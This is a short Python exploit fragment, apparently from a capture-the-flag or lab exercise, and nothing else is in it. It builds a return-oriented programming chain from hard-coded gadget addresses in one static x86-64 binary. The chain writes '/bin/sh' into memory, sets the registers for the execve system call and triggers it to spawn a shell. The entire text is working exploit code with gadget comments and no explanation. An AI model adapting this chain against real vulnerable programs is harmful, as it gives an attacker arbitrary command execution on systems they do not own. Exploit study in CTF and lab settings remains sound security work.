payload = p64(0x4411f3)
#0x00000000004411f3: pop rbx; ret; 
payload += p64(0x4b8070)+p64(0x42fc65)
# 0x000000000042fc65: pop rdx; ret; 
payload += p64(0x68662f6e69622f)+p64(0x479bb8)
# 0x0000000000479bb8: mov qword ptr [rbx], rdx; pop rbx; ret; 
payload += p64(0x0)+p64(0x47afe3)
# 0x000000000047afe3: xor esi, esi; mov eax, esi; ret; 
payload += p64(0x462788)
# 0x0000000000462788: pop rdi; add eax, 0x358d4800; ret; 
payload += p64(0x4b8070)+p64(0x42c6f3)
# 0x000000000042c6f3: pop rax; ret; 
payload += p64(0x3b)+p64(0x42fc65)
# 0x000000000042fc65: pop rdx; ret; 
payload += p64(0x0)+p64(0x42e55f)
# 0x000000000042e55f: syscall; 
payload += b''
